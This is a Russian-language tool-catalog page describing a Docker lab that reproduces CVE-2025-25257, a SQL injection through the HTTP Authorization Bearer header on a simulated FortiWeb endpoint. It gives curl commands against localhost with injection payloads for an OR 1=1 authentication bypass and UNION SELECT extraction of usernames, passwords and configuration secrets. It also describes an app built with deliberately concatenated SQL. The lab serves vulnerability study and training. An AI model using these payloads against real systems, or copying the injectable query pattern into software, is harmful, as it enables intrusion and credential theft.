Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2025-25257 — Воспроизводимая Docker-лаборатория для CVE-2025-25257, демонстрирующая обход SQL-инъекций и эксфильтрацию данных через заголовок HTTP Authorization на смоделированной конечной точке FortiWeb. | Kitploit
Инструменты/GitHubGitHub/lytianahkone-boop/cve-2025-25257
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийОбучение и ОбразованиеБезопасность Баз ДанныхЛаборатории и Практика
GitHublytianahkone-boop/cve-2025-25257

cve-2025-25257

Воспроизводимая Docker-лаборатория для CVE-2025-25257, демонстрирующая обход SQL-инъекций и эксфильтрацию данных через заголовок HTTP Authorization на смоделированной конечной точке FortiWeb.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
8 месяцев назадЕщё не проверено

CVE-2025-25257 - Среда экспериментов

Архитектура эксперимента (среда моделирует уязвимые компоненты FortiWeb)

root@kitploit:~
Уязвимая конечная точка: /api/system/fabric/config
Вектор инъекции: HTTP-заголовок Authorization: Bearer
Механизм: прямая конкатенация SQL (f-строка Python)
Аутентификация: отсутствует (полный обход)
База данных: SQLite (для демонстрации)

cve-2025-25257

├── Dockerfile
├── docker-compose.yml
├── requirements.txt
├── app.py
├── init_db.py
├── payload.txt
└── README.md

Dockerfile : намеренно уязвимый HTTP-сервис / предоставляет API, которое можно эксплуатировать без аутентификации

docker-compose.yml : оркестрирует воспроизводимый уязвимый сервис / предоставляет API, доступное для атаки через HTTP / изолирует среду экспериментов

requirements.txt : обеспечивает стабильную и воспроизводимую среду

app.py : реализует конечную точку перед аутентификацией / принимает пользовательский ввод через Authorization / объединяет этот ввод в SQL-запрос / позволяет обход аутентификации и извлечение данных

init_db.py : подготавливает набор данных, пригодный для эксплуатации / позволяет наглядно продемонстрировать обход аутентификации и эксфильтрацию данных

payload.txt : предоставляет минимальное, контролируемое и наблюдаемое доказательство выполнения кода

Шаг 1: Сборка и запуск контейнера

Сборка Docker-образа

docker-compose build

Запуск контейнера

docker-compose up -d

Проверка активности контейнера

docker-compose ps

Просмотр логов

docker-compose logs -f

Шаг 2: Проверка доступности сервиса

curl http://localhost:8080/api/system/status

Шаг 3: Эксплуатация уязвимости

Не вредоносный запрос

curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer valid_token_001"

Инъекция вредоносного SQL-запроса. Обход с помощью OR 1=1

curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer ' OR '1'='1"

Извлечение данных с помощью инъекции UNION-SELECT

curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer ' UNION SELECT id, username, password, role, email, NULL FROM users--"

Эксфильтрация чувствительных данных

curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer ' UNION SELECT id, key, value, description, '2025-01-01',NULL FROM system_config--"

Шаг 4: Очистка и остановка

Остановка контейнера

docker-compose down

Удаление томов

docker-compose down -v

Удаление образа

docker rmi cve-2025-25257-lab-fortiweb-vulnerable:latest

Скачать инструмент